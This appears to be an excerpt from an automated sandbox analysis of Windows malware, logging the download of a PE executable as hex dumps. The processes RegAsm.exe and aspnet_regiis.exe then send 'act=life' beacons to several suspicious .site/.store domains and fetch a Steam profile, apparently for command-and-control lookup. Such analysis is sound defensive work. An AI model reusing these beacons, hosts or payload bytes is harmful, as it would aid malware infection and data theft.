                                                                                                                                                                                                                                                                                    Cache-Control: max-age=14400
                                                                                                                                                                                                                                                                                    CF-Cache-Status: HIT
                                                                                                                                                                                                                                                                                    Age: 8135
                                                                                                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=kkCrqO3Wy%2FbgTPM4y7Ok0L5lpDdHVVr4YKr4fvgmkz11Z7sqxyiVQIVvoxvJQ7knqkAf%2Bc32ltbCMbS3%2BRFnPqiHRQ6pon4nRtQm30FU4TvdlSg4e4vuO63U9g1j5g%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                    Server: cloudflare
                                                                                                                                                                                                                                                                                    CF-RAY: 8cb58a225f930fa3-EWR
                                                                                                                                                                                                                                                                                    2024-09-30 16:20:18 UTC557INData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 a9 af fa 66 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0b 00 00 9a 00 00 00 be 04 00 00 00 00 00 0a c0 05 00 00 e0 04 00 00 20 00 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 e0 05 00 00 04 00 00 00 00 00 00 03 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                                                    Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PELf @ @
                                                                                                                                                                                                                                                                                    2024-09-30 16:20:18 UTC1369INData Raw: 5a 05 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                                                    Data Ascii: Z `
                                                                                                                                                                                                                                                                                    2024-09-30 16:20:18 UTC1369INData Raw: 2a d1 09 32 21 5f 4a df 8f 70 92 62 8e b4 55 ac 0e ab 10 20 06 9d 02 67 96 15 a0 a2 3d f1 d2 fd 59 ae c3 56 b8 82 d6 cf 89 cb 86 55 8d 60 79 a4 23 a4 8c 59 a2 d4 cd 21 b7 4a 34 52 78 d2 5a ce 5f ca 95 3f da 92 7e 62 d3 8d 98 b3 32 94 ac f3 ca 45 9f b8 63 42 6b 84 0e 94 c9 21 38 39 43 e5 0a 5d 4d d0 c6 cc 95 7b b7 88 60 29 05 83 9d 13 5e bb 2b 4f be 6a 8b 42 ef 94 8d d0 2e 52 67 f8 b4 a7 34 2b 6a d6 40 d8 a6 f7 7e 89 18 c4 49 ff 2f 32 ad 94 8e 54 7f 43 ff 10 63 31 3c 48 39 d0 2a 6e 89 ac 81 c8 5f 57 d2 4e ca be d1 2d 91 03 33 7d b7 d8 fd 6f 55 a1 4a 33 d6 fd be d0 bd e3 3b 27 c8 b4 81 e0 c0 e7 ba 83 bd 19 ca f0 73 8a f0 00 33 0e 3d a8 3c 80 8a ea 14 18 bd 2a aa 0b b7 f2 29 83 e1 55 98 ff d5 ac 8d 80 52 3f cc 1a db 8b 25 e8 74 ad ad 92 49 9a d1 f4 6a b0 24
                                                                                                                                                                                                                                                                                    Data Ascii: *2!_JpbU g=YVU`y#Y!J4RxZ_?~b2EcBk!89C]M{`)^+OjB.Rg4+j@~I/2TCc1<H9*n_WN-3}oUJ3;'s3=<*)UR?%tIj$
                                                                                                                                                                                                                                                                                    2024-09-30 16:20:18 UTC1369INData Raw: c4 63 2f f6 af b7 d6 df 2e 9e 90 e0 c0 27 0e c0 85 68 d1 d7 b6 d1 64 b9 cc 3e 1f 54 a9 64 f8 33 01 ee 13 85 bc e6 f9 b2 42 16 f0 39 ae 5e 29 b8 1d 81 31 f5 cc 40 e6 50 2b 80 1e f5 0f 0c ce 0c 54 56 06 c2 f5 5b 79 09 2c 4d 92 ac 2e f0 12 f7 f7 72 a3 83 0b 79 e4 40 32 3e bb 67 7d 88 21 fc f3 d3 ab 9c f2 44 e3 39 dd 15 5a 3c 38 21 08 7b fd 8a 47 20 1d f3 5d 75 05 ce f8 02 9c c5 f4 54 58 b2 0e fd 5e e9 c7 80 c8 77 31 fd 69 ae ab 8b c8 36 19 19 b4 e3 4d 0a dc 33 9f 96 49 22 93 44 27 71 0e 44 4c c7 fd d5 69 33 ed fc 3f 82 97 65 34 25 ee 12 ce fc 69 cb 20 42 2e ec d1 87 6d 65 fa df 86 9a 8b 67 12 9f 27 4d ff 34 e3 44 5c a8 f9 dd 07 ca 07 62 02 3d a4 fd 5e 1f ba ed 3f 57 23 36 72 09 57 4e e5 dc 32 2a 1d 1b b5 1d eb 72 1c a4 42 11 d1 18 88 d3 78 06 fb c9 bc 95 54
                                                                                                                                                                                                                                                                                    Data Ascii: c/.'hd>Td3B9^)1@P+TV[y,M.ry@2>g}!D9Z<8!{G ]uTX^w1i6M3I"D'qDLi3?e4%i B.meg'M4D\b=^?W#6rWN2*rBxT
                                                                                                                                                                                                                                                                                    2024-09-30 16:20:18 UTC1369INData Raw: e8 fc e3 ad bf e1 4f ed b8 ef ca a2 41 b9 d6 42 cf 04 88 2e 36 03 6e 0d 60 1f 6d 32 6e 58 83 38 3d 19 39 8a d6 ff eb dd 04 9f 67 4f f4 00 f3 b0 08 5f ff 07 4d 66 5e 0f 83 c9 89 d8 31 5d 3a 96 85 f1 6b 8d 99 46 c7 67 af 63 e9 dd 2d c9 aa bc df 14 03 1f 7c 38 71 c7 18 09 59 64 fa 86 f3 e6 44 d9 b0 41 47 cf 54 23 a1 d6 3a b7 e3 a9 d8 94 31 1c 80 9e c3 8a e8 8e 6e bc 99 7f ac c5 a7 81 bd bf 4c d4 19 68 56 d5 34 5a 93 64 85 bf 45 de 53 ad e1 89 5b 4b 7c fe 41 f4 14 3b c7 86 19 c8 0d 2f 26 59 47 b0 67 67 2b d5 94 b3 9a ff 52 28 1a 89 05 b5 09 16 f3 0c 2c 9c 01 20 b7 0f 6b e6 d8 73 e1 17 e6 2d 72 86 f3 a0 dd f6 c0 cc 84 d6 32 74 d4 4f 6f 17 d1 5f 5d 4d cf b4 3a 85 84 4b 49 75 2f bf c2 ec 5a 36 6d 66 6a 93 e9 7b e3 e1 e2 a7 d1 9c a3 e6 fc 41 19 ff e2 06 aa f2 77
                                                                                                                                                                                                                                                                                    Data Ascii: OAB.6n`m2nX8=9gO_Mf^1]:kFgc-|8qYdDAGT#:1nLhV4ZdES[K|A;/&YGgg+R(, ks-r2tOo_]M:KIu/Z6mfj{Aw
                                                                                                                                                                                                                                                                                    2024-09-30 16:20:18 UTC1369INData Raw: ec 06 9e bc 86 8f 18 6c e3 09 5b 14 1a b5 29 f9 ca 5a 0a 4d 8b ef 78 e8 03 a5 06 5e f4 6b a4 f3 08 e4 4b 9c bb 48 35 2d b0 b0 db 74 af 82 3f 06 c3 d0 ad 24 27 01 1e dc bc ea 9e 41 f4 0b 5a ff fd a7 06 a0 45 f9 87 7a 5b 57 5f 1b 7a b5 c1 22 37 1f c5 6f bf 7a c4 de 03 db 8e 33 a0 55 a1 d3 ec 94 b4 3b 72 1f be 9a 21 51 a2 e6 7e e7 ba 63 4e 1d af 9f 22 5c af ba 05 ee ed 91 85 70 05 ae 91 78 c0 ab 08 8a e8 b9 b5 cd 74 7a b5 ed ed e4 6e 40 22 42 f1 b0 3c cb 21 91 39 1d 00 72 df 18 7d 88 94 a5 3a 7e 0c 31 cf cf 64 65 a8 b4 4a 83 23 cb c7 2b a0 6b de ff cb 90 a4 b0 8e 46 b7 e4 3a 75 21 6b e4 df eb f1 32 99 67 95 78 4f ba 73 b8 78 ac 07 c2 1c e3 5f 7c 90 68 09 81 a3 01 77 14 b8 23 35 7a c9 26 7a 1c 57 ef b4 6a e3 dd 40 7d 4b 6e ca 80 28 e8 44 9e 4b dc 22 8b c4 25
                                                                                                                                                                                                                                                                                    Data Ascii: l[)ZMx^kKH5-t?$'AZEz[W_z"7oz3U;r!Q~cN"\pxtzn@"B<!9r}:~1deJ#+kF:u!k2gxOsx_|hw#5z&zWj@}Kn(DK"%
                                                                                                                                                                                                                                                                                    2024-09-30 16:20:18 UTC1369INData Raw: fd b2 46 cd 99 ef e2 a5 b0 59 8a af cd ff 30 1b 38 6d d1 75 19 74 92 59 bb aa 3b f8 f8 ea b5 19 04 71 23 ab 0c 31 da 23 13 d8 73 fc f8 7d c4 17 b2 2a e8 2e 30 bc 6f f3 5a 2e 8c 54 f2 b6 24 bc ef 2e 0c 49 4b 3d e1 17 f6 24 c1 6b 03 03 8a e0 90 d0 48 70 88 e4 94 16 c2 a9 a4 c9 9a 5b fa f3 21 10 57 93 f4 60 23 61 9e ef bd 03 ab d0 74 78 55 aa b8 db 2f 67 85 e3 6b 20 06 a8 ab 08 ee 3b 06 06 92 37 82 da 99 54 77 58 a9 4e 72 12 50 1f 68 78 50 08 e5 2d 28 f5 79 62 d0 63 4e 76 c0 9c ca 93 bb 76 46 20 e1 88 96 d4 b1 5f a0 59 3b 77 aa 0e 29 72 02 1b 5c ff 3b 52 85 19 3b aa 97 60 11 9e fb c0 85 3e ec 6d bf a4 31 e4 f9 e8 b8 71 6d 15 31 57 65 9a 30 0f 99 eb 22 18 60 66 33 bb 06 12 33 cb 62 50 ac 0e 16 6c 60 2a a8 5f d2 39 58 ee 26 3b 90 c9 fb 5d 0c f0 b8 77 27 09 9b
                                                                                                                                                                                                                                                                                    Data Ascii: FY08mutY;q#1#s}*.0oZ.T$.IK=$kHp[!W`#atxU/gk ;7TwXNrPhxP-(ybcNvvF _Y;w)r\;R;`>m1qm1We0"`f33bPl`*_9X&;]w'
                                                                                                                                                                                                                                                                                    2024-09-30 16:20:18 UTC1369INData Raw: ac 80 75 f8 16 db f8 71 77 a9 b4 de 8b 8e 82 54 49 2e 01 be 29 c7 d8 4e 55 8d a9 97 b9 36 a5 ab 4d 34 a1 55 d2 0b 40 1d 8a d0 95 1b 90 78 c7 5c e8 58 4f a8 9c 49 8e da 2d 04 f3 cb 32 69 79 75 c3 2a a8 f4 36 79 b1 db 3d a1 ee 55 3a 0f d0 ff 5d d6 e6 02 4c f2 10 64 20 95 94 e0 10 c1 e8 c2 52 a6 89 bd 01 dc 14 b3 f6 2d 78 c1 31 9e 4e 91 d6 db 2d 39 31 5b 14 da f4 f1 7c fc 4e 59 c0 80 38 76 23 09 bc 67 b8 57 f4 20 e3 d8 2b 19 22 b9 b5 ac d5 e1 39 98 a9 cb 6b 79 66 de cf 4f 97 46 27 6e 7f e7 88 65 81 cf aa a2 aa 52 de 25 ca 83 54 15 07 39 5c b3 7b ac 3f 82 f2 4b de c7 b0 88 9c c8 7a fe fb 40 d9 50 f4 2e 1d 33 15 01 b8 5f ac 63 47 6c 19 c9 7d 0f f4 92 92 42 16 38 7f 44 d9 cb 45 da c6 9b 36 42 c5 1b ae b2 fb d6 dd dc a7 f1 de 12 a3 79 45 3f 26 38 ca bc ff ef 41
                                                                                                                                                                                                                                                                                    Data Ascii: uqwTI.)NU6M4U@x\XOI-2iyu*6y=U:]Ld R-x1N-91[|NY8v#gW +"9kyfOF'neR%T9\{?Kz@P.3_cGl}B8DE6ByE?&8A
                                                                                                                                                                                                                                                                                    2024-09-30 16:20:18 UTC1369INData Raw: 08 bf f5 2f 45 51 84 24 b3 db d0 97 44 9c 47 38 2a 7b 45 63 90 62 a1 d1 da 56 a8 3f 0f 39 19 02 53 9c d6 2a 5f 96 83 c7 47 ce f8 2f c6 18 fa 0a 97 32 e8 88 d2 d5 f0 ec d1 6d e1 0c 9c dd 7e 1a ed a8 26 a9 fc d2 ec fe c6 80 8f 3f dd c0 2c 6b ef 73 dd cf a1 71 1e 96 7d 4c 10 7a 97 54 01 79 92 43 01 43 9e 06 ca fb 98 0f 03 cb 96 a9 e0 1f 8c 93 4b 05 41 01 30 3d b0 1f ee 19 28 ff 66 b3 03 ff d7 17 a6 85 a0 78 01 50 92 12 4e 64 87 81 19 1a 8e fc 6b 79 c7 25 73 3a cc 67 29 aa af 00 60 e7 9c 56 98 8d 56 ba cf 61 0f a4 74 f5 9f 0d 70 55 be ad 23 00 28 5f 5a 37 07 91 a3 7a 76 a2 0d 24 76 e6 ff 9e cc cf 45 30 9d 71 e9 d6 54 eb d1 0b b1 d6 b1 f7 1f b4 7d ef af ca 05 82 91 29 75 4e 5b a0 91 b7 6b c8 b5 19 17 e7 6e db 91 8e 8d e7 9a d7 e8 f1 53 b0 b5 bf 47 c8 6c 10 de
                                                                                                                                                                                                                                                                                    Data Ascii: /EQ$DG8*{EcbV?9S*_G/2m~&?,ksq}LzTyCCKA0=(fxPNdky%s:g)`VVatpU#(_Z7zv$vE0qT})uN[knSGl
                                                                                                                                                                                                                                                                                    2024-09-30 16:20:18 UTC1369INData Raw: af 8e f5 64 a0 f2 f3 2e e8 06 9b 3f db 6b 92 d6 20 69 e9 15 71 e6 b4 61 bf 93 21 0f 67 7b b9 07 df 85 b6 46 fd 94 66 3a ba 39 34 30 c7 34 98 69 be 4d 56 4c ea a2 cc b7 28 f8 bd 53 9f d2 f1 49 4b b5 18 f6 91 a8 33 f6 13 02 1a e0 09 cc 2c f9 d3 22 de 0f f7 9b 82 06 2f fa 1c c6 00 49 8f 05 9e 22 68 5e 9f 65 f7 e6 37 07 52 c5 41 45 d7 94 e2 b8 ff ba f9 31 08 59 f0 99 69 eb ba 8d af a1 c1 e0 1b dc 34 a9 aa 57 a7 9a 7a a8 c6 63 29 95 f1 a0 94 96 41 cb 10 b5 f8 d7 92 fe da 8b e1 84 f8 6b 22 b3 63 f8 d8 75 69 a4 bd c9 94 82 4d 11 89 c0 d5 e0 b5 cf de a9 42 ac 37 39 7b fc ea 96 f6 3c ae ad 00 92 79 11 6a 79 5c f2 94 07 f0 c2 cd c3 54 19 b3 89 ad 87 85 18 60 3d 61 2b ef 16 7a 5d 09 7d df 96 dd 69 35 53 e9 1d ee ab ac 68 ca d5 e3 63 9b 82 d3 74 64 4d e4 d7 6d 15 51
                                                                                                                                                                                                                                                                                    Data Ascii: d.?k iqa!g{Ff:9404iMVL(SIK3,"/I"h^e7RAE1Yi4Wzc)Ak"cuiMB79{<yjy\T`=a+z]}i5ShctdMmQ


                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                    5192.168.2.1049719172.67.197.404438060C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                    2024-09-30 16:20:20 UTC264OUTPOST /api HTTP/1.1
                                                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                    Content-Length: 8
                                                                                                                                                                                                                                                                                    Host: offeviablwke.site
                                                                                                                                                                                                                                                                                    2024-09-30 16:20:20 UTC8OUTData Raw: 61 63 74 3d 6c 69 66 65
                                                                                                                                                                                                                                                                                    Data Ascii: act=life
                                                                                                                                                                                                                                                                                    2024-09-30 16:20:20 UTC798INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                    Date: Mon, 30 Sep 2024 16:20:20 GMT
                                                                                                                                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                                    Set-Cookie: PHPSESSID=jp9cms2k0v2g73nhbgqv9n3b0v; expires=Fri, 24 Jan 2025 10:06:59 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                                                                                    Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                                                                    Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                                                                                                                                    CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=iAHZRe0z7isa0Itc3mrvBepDWSZ8ehCX5ZthTFgHS83XOjdWZPXuihhHSJ5hN4WJbBIhfXibhpcOJvXPH21bY8PGfc3zutYlGMRAcIAqfYGBg6bzB5oCfrPfVOtRywWaf7HbRw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                    Server: cloudflare
                                                                                                                                                                                                                                                                                    CF-RAY: 8cb58a2aebaf8c90-EWR
                                                                                                                                                                                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                                    2024-09-30 16:20:20 UTC15INData Raw: 61 0d 0a 65 72 72 6f 72 20 23 44 31 32 0d 0a
                                                                                                                                                                                                                                                                                    Data Ascii: aerror #D12
                                                                                                                                                                                                                                                                                    2024-09-30 16:20:20 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                    Data Ascii: 0


                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                    6192.168.2.1049726188.114.96.34433768C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe
                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                    2024-09-30 16:20:24 UTC267OUTPOST /api HTTP/1.1
                                                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                    Content-Length: 8
                                                                                                                                                                                                                                                                                    Host: explorationmsn.store
                                                                                                                                                                                                                                                                                    2024-09-30 16:20:24 UTC8OUTData Raw: 61 63 74 3d 6c 69 66 65
                                                                                                                                                                                                                                                                                    Data Ascii: act=life
                                                                                                                                                                                                                                                                                    2024-09-30 16:20:24 UTC806INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                    Date: Mon, 30 Sep 2024 16:20:24 GMT
                                                                                                                                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                                    Set-Cookie: PHPSESSID=qkaro3r9htvtocgr2brsdgnlvk; expires=Fri, 24 Jan 2025 10:07:03 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                                                                                    Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                                                                    Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                                                                                                                                    CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=VvqE48hOQPIabeeku4%2FjnR7lKFiLzgJgbi0SMDusZLOYzXqD5BaC4i2uM9fhCC0f3Jmvj%2FhkH3p8oSHgvaual3R1zIbIGHzJsUvXXaJFWU7aYw75vklGsMxucwqHW3hfeHTnzSHHIw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                    Server: cloudflare
                                                                                                                                                                                                                                                                                    CF-RAY: 8cb58a433f6478e7-EWR
                                                                                                                                                                                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                                    2024-09-30 16:20:24 UTC15INData Raw: 61 0d 0a 65 72 72 6f 72 20 23 44 31 32 0d 0a
                                                                                                                                                                                                                                                                                    Data Ascii: aerror #D12
                                                                                                                                                                                                                                                                                    2024-09-30 16:20:24 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                    Data Ascii: 0


                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                    7192.168.2.1049728104.21.1.1694433768C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe
                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                    2024-09-30 16:20:25 UTC265OUTPOST /api HTTP/1.1
                                                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                    Content-Length: 8
                                                                                                                                                                                                                                                                                    Host: underlinemdsj.site
                                                                                                                                                                                                                                                                                    2024-09-30 16:20:25 UTC8OUTData Raw: 61 63 74 3d 6c 69 66 65
                                                                                                                                                                                                                                                                                    Data Ascii: act=life
                                                                                                                                                                                                                                                                                    2024-09-30 16:20:25 UTC780INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                    Date: Mon, 30 Sep 2024 16:20:25 GMT
                                                                                                                                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                                    Set-Cookie: PHPSESSID=emtsackfrsdgp8ktmieugtu1mh; expires=Fri, 24 Jan 2025 10:07:04 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                                                                                    Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                                                                    Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                                                                                                                                    CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=wc7nvj7dRhDLFX7MGBPdiS45mWXQ6reP%2BIYuyq1AXUu%2FsJG9wLkuu%2Fbb7eFJzU%2BssDhEfkKggHxn%2Fqyx081XAWlm%2BkmAfxjYyTIX6fdTMx2WYe97%2F6crH7oUHpqoCjJyyMwY7NY%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                    Server: cloudflare
                                                                                                                                                                                                                                                                                    CF-RAY: 8cb58a4bdfa24269-EWR
                                                                                                                                                                                                                                                                                    2024-09-30 16:20:25 UTC15INData Raw: 61 0d 0a 65 72 72 6f 72 20 23 44 31 32 0d 0a
                                                                                                                                                                                                                                                                                    Data Ascii: aerror #D12
                                                                                                                                                                                                                                                                                    2024-09-30 16:20:25 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                    Data Ascii: 0


                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                    8192.168.2.1049732104.102.49.2544433768C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe
                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                    2024-09-30 16:20:27 UTC219OUTGET /profiles/76561199724331900 HTTP/1.1
                                                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                    Host: steamcommunity.com
                                                                                                                                                                                                                                                                                    2024-09-30 16:20:27 UTC1870INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                    Server: nginx
                                                                                                                                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                    Content-Security-Policy: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.akamai.steamstatic.com/ https://cdn.akamai.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.akamai.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq. [TRUNCATED]
                                                                                                                                                                                                                                                                                    Expires: Mon, 26 Jul 1997 05:00:00 GMT
                                                                                                                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                                                                                                                    Date: Mon, 30 Sep 2024 16:20:27 GMT
                                                                                                                                                                                                                                                                                    Content-Length: 34678
                                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                                    Set-Cookie: sessionid=db1d43d614fdfcd029bd4655; Path=/; Secure; SameSite=None
                                                                                                                                                                                                                                                                                    Set-Cookie: steamCountry=US%7Cd7fb65801182a5f50a3169fe2a0b7ef0; Path=/; Secure; HttpOnly; SameSite=None
                                                                                                                                                                                                                                                                                    2024-09-30 16:20:27 UTC14514INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 20 72 65 73 70 6f 6e 73 69 76 65 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 0d 0a 09 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 74 68 65 6d 65 2d 63 6f 6c 6f 72 22 20 63 6f 6e 74 65 6e 74 3d 22 23 31 37 31 61 32 31 22 3e 0d 0a 09 09 3c
                                                                                                                                                                                                                                                                                    Data Ascii: <!DOCTYPE html><html class=" responsive" lang="en"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><meta name="viewport" content="width=device-width,initial-scale=1"><meta name="theme-color" content="#171a21"><
